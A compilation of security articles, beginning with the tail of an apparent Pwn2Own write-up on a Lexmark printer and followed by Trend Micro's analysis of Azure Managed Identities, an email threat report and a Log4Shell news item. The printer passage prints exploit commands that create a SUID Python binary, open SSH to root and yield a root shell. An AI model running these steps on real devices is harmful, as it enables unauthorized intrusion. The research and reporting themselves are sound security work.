    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

An Analysis of Azure Managed Identities Within Serverless Environments

We examine Azure’s Managed Identities service, developers’ go-to feature for managing secrets and credentials, and assess its security properties under a threat model.

Authentication and authorization play crucial parts when securing resources. Authentication verifies that the service or user accessing the secured resources has provided valid credentials, while authorization makes sure that they have sufficient permissions for the request itself.

Broken access control has been listed among the OWASP Top 10 prevalent web application issues from 2017 to 2021, and we have previously written about the importance of secrets management for authentication. Broken access control occurs when a user can access, modify, delete, or perform actions within an application or system outside the permissions or policies set for them, whether maliciously or unintentionally. It has become the number one concern on the OWASP list, and in this article we discuss how Azure’s Managed Identities service, inside the cloud service provider (CSP), tackles this web application issue.

Managing system and user identities

Managed Identities for Azure allows applications to authenticate to certain services available within the CSP. This is done by providing the cloud application with a token used for service authentication. We distinguish between two types of managed identities: system-assigned identities and user-assigned identities. A system-assigned identity is tied one-to-one to its resource, which means that different roles can’t be applied to the same resource. User-assigned identities solve this problem; they can be thought of as user roles.

Figure 1. Usage of Managed Identities


For instance, suppose we want to use an Azure storage account within a serverless application for saving our application records. For this purpose, we decide to use a system-assigned identity.

In practice, this means:

  • Enable managed identities inside a serverless function
  • Grant serverless functions the necessary permissions for storage account access

Figure 2. Enabling managed identities in a serverless function


After that, we can start using the managed identity for authentication to the storage account. In the following sections, we will look at how the managed identities interface is technically implemented within the serverless environment and the corresponding security implications based on our recent research.

Managing identities in the serverless environment

To make this work, the serverless environment runs a special .NET application process named “dotnet TokenServiceContainer.dll.” This process listens on localhost port 8081 for HTTP requests. The endpoint for requesting a token is http://localhost:8081/msi/token; its required parameters specify the API version used and the resource identifier for which the token is requested. Optionally, a “client_id” parameter is supplied when a token for a user-assigned identity is requested. The request also needs a specific X-IDENTITY-HEADER header, whose value is taken from the IDENTITY_HEADER or MSI_SECRET environment variable.

After receiving a token request, the process delegates it to an endpoint within the CSP (another service), which provides the requested token. That endpoint is publicly reachable and is part of the *.identity.azure.net subdomain corresponding to the region of the serverless application. Because the endpoint is publicly accessible, the service requires authentication by design, and this is done using an X.509 client certificate. The certificate is unique to the specific application ID (the serverless function has a one-to-one pairing of certificate and app ID) and is valid for 180 days. If the request is successful, it returns a JSON response with a bearer token valid for one day.

Figure 3. Managed identities inside serverless environments


From that perspective, the security standard is high, as expected of a CSP service. However, there is one hidden danger, and that is the certificate itself: it can be exposed by leaking environment variables.

The Managed Service Identity (MSI) certificate is part of the encrypted container context, which can be retrieved from the URL held in the CONTAINER_START_CONTEXT_SAS_URI variable and decrypted using the CONTAINER_ENCRYPTION_KEY variable. Once the certificate is leaked, it can be used to obtain the token outside the scope of the CSP’s services, against the publicly available endpoint, just as if the request came from the CSP service.

Threat model and scenario

Figure 4. PoC of getting token using leaked environmental variables from Managed Identity service


At this point, we should emphasize that to abuse the obtained token, some actor (or malicious actor) must first leak these environment variables, and a role must be assigned for the requested resource; the prerequisites are that managed identities are enabled and a role is set for the application. There are no default roles unless they are explicitly specified in the CSP settings.

However, as this example of a potential compromise through leaked environment variables on a Linux endpoint shows, storing sensitive information in environment variables is not a secure approach, because they are inherited by child processes by default. Since the information is available inside the environment itself and the certificate carries everything needed, the endpoint for obtaining the token effectively becomes publicly usable: a threat actor can obtain the authentication token outside of the CSP’s service and gain all the permissions of the original identity.

In this example, the token provider service within the serverless environment runs under a different user. Why, then, is the client certificate not available only to that user, as a file with permissions restricted to it? As things stand, a compromised serverless function can leak the certificate and obtain the access token from the external service. While the unauthorized user can’t gain privileges beyond what the function already has, this is enough to conduct activities inside the environment that can have a range of damaging effects. By moving the client certificate into the security boundary of the token service user and granting read access only to that user, we guarantee that even in case of a compromise, the client certificate could not be leaked and used outside the CSP service without additional lateral movement.

The security chain is only as strong as its weakest link. While CSP services are not inherently insecure, small design weaknesses combined with improper user configurations can lead to bigger, more damaging consequences. Design applications, environments, and all their related variables with security in mind. If possible, avoid using environment variables. Following best security practices such as applying the principle of least privilege helps to mitigate the consequences of a breach.
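As an added example (not code from the Trend Micro article or from Azure), the following POSIX shell functions put two of the points above into practice: fetch_msi_token requests a token from the local endpoint described in the “Managing identities in the serverless environment” section, and run_without_secrets launches a child process with the secret-bearing variables from the threat model removed, so a spawned tool cannot inherit them. The endpoint, header and variable names are those the article gives; the api-version value, the resource URL in the usage note, and the use of curl are assumptions.

```shell
#!/bin/sh
# Added example; not code from the Trend Micro article or from Azure.
# Two habits that follow from the article: ask the local token service for
# a token the intended way, and start child processes without the
# secret-bearing variables so a spawned tool cannot inherit them.
# Endpoint, header and variable names are those the article names; the
# api-version value is an assumption.

MSI_ENDPOINT=${MSI_ENDPOINT:-http://localhost:8081/msi/token}
MSI_API_VERSION=${MSI_API_VERSION:-2019-08-01}   # assumed value
SECRET_VARS='IDENTITY_HEADER MSI_SECRET CONTAINER_ENCRYPTION_KEY CONTAINER_START_CONTEXT_SAS_URI'

msi_secret() {
    # The shared secret the token service expects in X-IDENTITY-HEADER,
    # taken from IDENTITY_HEADER or, failing that, MSI_SECRET.
    if [ -n "${IDENTITY_HEADER:-}" ]; then
        printf '%s' "$IDENTITY_HEADER"
    elif [ -n "${MSI_SECRET:-}" ]; then
        printf '%s' "$MSI_SECRET"
    else
        return 1
    fi
}

fetch_msi_token() {
    # Request a token for resource $1 (optionally for the user-assigned
    # identity with client id $2). The secret is handed to curl through a
    # config file on stdin rather than on argv, so it does not show up in
    # process listings; --get/--data-urlencode handle query-string encoding.
    secret=$(msi_secret) || { echo 'no IDENTITY_HEADER/MSI_SECRET set' >&2; return 1; }
    if [ -n "${2:-}" ]; then
        set -- --data-urlencode "resource=$1" --data-urlencode "client_id=$2"
    else
        set -- --data-urlencode "resource=$1"
    fi
    printf 'header = "X-IDENTITY-HEADER: %s"\n' "$secret" |
        curl --silent --show-error --fail --get --config - \
             --data-urlencode "api-version=$MSI_API_VERSION" "$@" "$MSI_ENDPOINT"
}

run_without_secrets() {
    # Run "$@" with every secret-bearing variable removed from its
    # environment, the opposite of the inherit-everything default the
    # article warns about.
    for v in $SECRET_VARS; do
        set -- -u "$v" "$@"
    done
    env "$@"
}
```

Inside a function app, fetch_msi_token https://storage.azure.com/ (an assumed resource URL) returns the JSON document whose access_token field is the bearer token; any helper the function spawns for other work should be started with run_without_secrets so that a bug in that helper cannot read the identity header or the container context variables.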

Source :
https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/an-analysis-of-azure-managed-identities-within-serverless-environments

Trend Micro Cloud App Security Threat Report 2021

In this report, we highlight the notable email threats of 2021, including over 33.6 million high-risk email threats (representing a 101% increase from 2020’s numbers) that we’ve detected using the Trend Micro Cloud App Security platform.

Email is an integral cog in the digital transformation machine. This was especially true in 2021, when organizations found themselves trying to keep business operations afloat in the middle of a pandemic that has forever changed how people work. At a time when the workplace had already largely shifted from offices to homes, malicious actors continued to favor email as a low-effort yet high-impact attack vector to disseminate malware.

Email is popular among cybercriminals not only for its simplicity but also for its efficacy. In fact, 74.1% of the total threats blocked by Trend Micro in 2021 were email threats. Meanwhile, the 2021 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3) states that there was “an unprecedented increase in cyberattacks and malicious cyber activity” last year, with business email compromise (BEC) being among the top incidents.

In this report, we discuss the notable email threats of 2021 based on the data that we’ve gathered using the Trend Micro™ Cloud App Security™, a security solution that supplements the preexisting security features in email and collaboration platforms.

Download our infographic

Malware detections surge as attacks become more elaborate, targeted

The Trend Micro Cloud App Security solution detected and thwarted a total of 3,315,539 malware files in 2021. More urgently, this number represents an increase of a whopping 196% from 2020’s numbers. There were also huge spikes in both known and unknown malware detections in 2021, at 133.8% and 221%, respectively.

Cybercriminals worked overtime to attach malware in malicious emails in 2021 using advanced tactics and social engineering lures. In January, we saw how Emotet sent spam emails that used hexadecimal and octal representations of IP addresses for detection evasion in its delivery of malware such as TrickBot and Cobalt Strike.

In May last year, we reported on Panda Stealer, an information stealer that targets cryptocurrency wallets and credentials via spam emails. We also shared an update on APT-C-36 (aka Blind Eagle), an advanced persistent threat (APT) group targeting South American entities using a spam campaign that used fraudulent emails impersonating Colombia’s national directorate of taxes and customs and even fake infidelity email lures.

QAKBOT operators also resumed their spam campaign in late 2021 after an almost three-month hiatus and abused hijacked email threads to lead victims to both QAKBOT and the SquirrelWaffle malware loader.

Meanwhile, ransomware detections continued to decline in 2021, a consistent trend that we have been seeing in previous years. Last year, the Trend Micro Cloud App Security solution detected and blocked 101,215 ransomware files — a 43.4% decrease compared to 2020’s detections.

The reason behind this continuing decline is possibly two-fold. One, unlike legacy ransomware that focuses on the quantity of victims, modern ransomware focuses on waging highly targeted and planned attacks to yield bigger profits. Since today’s ransomware actors no longer abide by the spray-and-pray ransomware model, the number of attacks is no longer as massive as the number that we witnessed in ransomware’s early days. We identified the other reason in our year-end roundup report: it’s possible that ransomware detections are down because our cybersecurity solutions continue to block an increasing number of ransomware affiliate tools each year, including TrickBot and BazarLoader. This could have prevented ransomware attacks from being successfully executed on victim environments.

Known, unknown, and overall credential phishing attacks rose in 2021

Based on Trend Micro Cloud App Security data, 6,299,883 credential phishing attacks were detected and blocked in 2021, which accounts for a 15.2% overall increase. Similar to last year, the number of known credential phishing attacks is greater than the unknown ones. However, this year, the percentage of increase is at a staggering 72.8%.

When comparing 2020 and 2021’s numbers, we saw an 8.4% increase in the number of detections for known credential phishing links, while a 30% growth is observed in the number of detections for unknown credential phishing links.

Abnormal Security noted the increase in overall credential phishing attacks in one 2021 report and stated that credential phishing is attributed to 73% of all advanced threats that they’ve analyzed.

We have also documented the rise in credential phishing attacks from previous years. In fact, in the first half of 2019, the Trend Micro Cloud App Security solution detected and blocked 2.4 million credential phishing attacks alone.

BEC’s small numbers bring big business losses

The Trend Micro Cloud App Security solution intercepted a total of 283,859 BEC attacks in 2021. Compared with 2020’s BEC detections, this number represents a 10.61% decrease. Interestingly, there is an 82.7% increase in this year’s BEC attacks that were detected using Writing Style DNA, while there is a 38.59% decrease in attacks that have been blocked using the antispam engine.

Overall, BEC numbers have consistently been on a downward trend since 2020. But the reduction in BEC victims doesn’t equate to a dip in cybercriminal profits. According to the FBI’s IC3, BEC accounted for US$2.4 billion in adjusted losses for both businesses and consumers in 2021. According to the same organization, BEC losses have reached over US$43 billion between June 2016 and December 2021 for both domestic and international incidents.

We have also observed how BEC actors continuously tweak their tactics for ill gain. In August last year, our telemetry showed a gradual increase in BEC detections. Upon investigation, we discovered that instead of impersonating company executives and upper management personnel, this BEC-related email campaign impersonated and targeted ordinary employees for money transfers and bank payroll account changes.

Covid-19 lures, cybercriminal campaigns behind massive jump in phishing numbers

The Trend Micro Cloud App Security solution data shows that a total of 16,451,166 phishing attacks were detected and blocked in 2021. This is a 137.6% growth from 2020’s phishing numbers.

In contrast to last year’s numbers, we saw a significant jump in phishing attacks detected via spam count this year — a whopping 596% increase, to be specific. Meanwhile, we observed a notable 15.26% increase in credential phishing count compared to last year.

These high numbers reflect organizations’ sentiments about phishing attacks. According to a survey in an Osterman Research report titled “How to Reduce the Risk of Phishing and Ransomware,” organizations were “concerned” or “extremely concerned” about phishing attempts making their way to end users and employees failing to spot phishing and social engineering attacks before accessing a link or attachment.

While cybercriminals kicked off the majority of Covid-19-related phishing emails and sites in 2020, they still exploited the global pandemic for financial gain last year. Mexico-based medical laboratory El Chopo shared that a fraudulent website that looked identical to the company’s had been launched. On that website, users could schedule a vaccination appointment after paying MXN2,700 (approximately US$130). To make the fake website appear credible, the malicious actors behind it added fake contact information such as email addresses and social media pages that victims could use for inquiries.

Early last year, we reported on a wave of phishing emails that pretended to be coming from national postal systems. This campaign attempted to steal credit card numbers from 26 countries. We also investigated a spear-phishing campaign that used Pegasus spyware-related emails to lead victims into downloading a file stealer. This campaign targeted high-ranking political leaders, activists, and journalists in 11 countries.

Protect emails, endpoints, and cloud-based services and apps from attacks with Trend Micro Cloud App Security

Organizations should consider a comprehensive multilayered security solution such as Trend Micro Cloud App Security. It supplements the preexisting security features in email and collaboration platforms like Microsoft 365 and Google Workspace (formerly known as G Suite) by using machine learning (ML) to analyze and detect any suspicious content in the message body and attachments of an email. It also acts as a second layer of protection after emails and files have passed through Microsoft 365 or Gmail’s built-in security.

Trend Micro Cloud App Security uses technologies such as sandbox malware analysis, document exploit detection, and file, email, and web reputation technologies to detect malware hidden in Microsoft 365 or PDF documents. It provides data loss prevention (DLP) and advanced malware protection for Box, Dropbox, Google Drive, SharePoint Online, OneDrive for Business, and Salesforce while also enabling consistent DLP policies across multiple cloud-based applications. It also offers seamless integration with an organization’s existing cloud setup, preserving full user and administrator functionality, providing direct cloud-to-cloud integration through vendor APIs, and minimizing the need for additional resources by assessing threat risks before sandbox malware analysis.

Trend Micro Cloud App Security stands on the cutting edge of email and software-as-a-service (SaaS) security, offering ML-powered features that combat two of the primary email-based threats: BEC and credential phishing. Writing Style DNA can help determine if an email is legitimate by using ML to model a user’s writing style from past emails and then comparing suspicious emails against it. Computer vision, on the other hand, combines image analysis and ML to check branded elements, login forms, and other site content. It then pools this information with site reputation elements and optical character recognition (OCR) to check for fake and malicious sites — all while reducing instances of false positives in detecting credential phishing emails.

This security solution also comes with an option to rescan historical URLs in users’ email metadata and perform continued remediation (automatically taking configured actions or restoring quarantined messages) using newer patterns updated by Web Reputation Services.

This is a significant option since users’ email metadata might include undetected suspicious or dangerous URLs that have only recently been discovered. The examination of such metadata is thus an important part of forensic investigations that help determine if your email service has been affected by attacks. This solution also officially supports the Time-of-Click Protection feature to protect Exchange Online users against potential risks when they access URLs in incoming email messages.

Trend Micro Cloud App Security also comes with the advanced and extended security capabilities of Trend Micro XDR, providing investigation, detection, and response across your endpoints, email, and servers.

Source :
https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/trend-micro-cloud-app-security-threat-report-2021

Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.

“Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and [Unified Access Gateway] servers,” the agencies said. “As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command-and-control (C2).”

In one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.

Log4Shell, tracked as CVE-2021-44228 (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that’s used by a wide range of consumers and enterprise services, websites, applications, and other products.

Successful exploitation of the flaw could enable an attacker to send a specially-crafted command to an affected system, enabling the actors to execute malicious code and seize control of the target.

Based on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed “hmsvc.exe” that’s equipped with capabilities to log keystrokes and deploy additional malware.

“The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,” the agencies noted, adding it also offers a “graphical user interface (GUI) access over a target Windows system’s desktop.”

The PowerShell scripts, observed in the production environment of a second organization, facilitated lateral movement, enabling the APT actors to implant loader malware containing executables that include the ability to remotely monitor a system’s desktop, gain reverse shell access, exfiltrate data, and upload and execute next-stage binaries.

Furthermore, the adversarial collective leveraged CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager that came to light in April 2022, to deliver the Dingo J-spy web shell.

Ongoing Log4Shell-related activity even after more than six months suggests that the flaw is of high interest to attackers, including state-sponsored advanced persistent threat (APT) actors, who have opportunistically targeted unpatched servers to gain an initial foothold for follow-on activity.

According to cybersecurity company ExtraHop, Log4j vulnerabilities have been subjected to relentless scanning attempts, with financial and healthcare sectors emerging as an outsized market for potential attacks.

“Log4j is here to stay, we will see attackers leveraging it again and again,” IBM-owned Randori said in an April 2022 report. “Log4j buried deep into layers and layers of shared third-party code, leading us to the conclusion that we’ll see instances of the Log4j vulnerability being exploited in services used by organizations that use a lot of open source.”

Source :
https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html
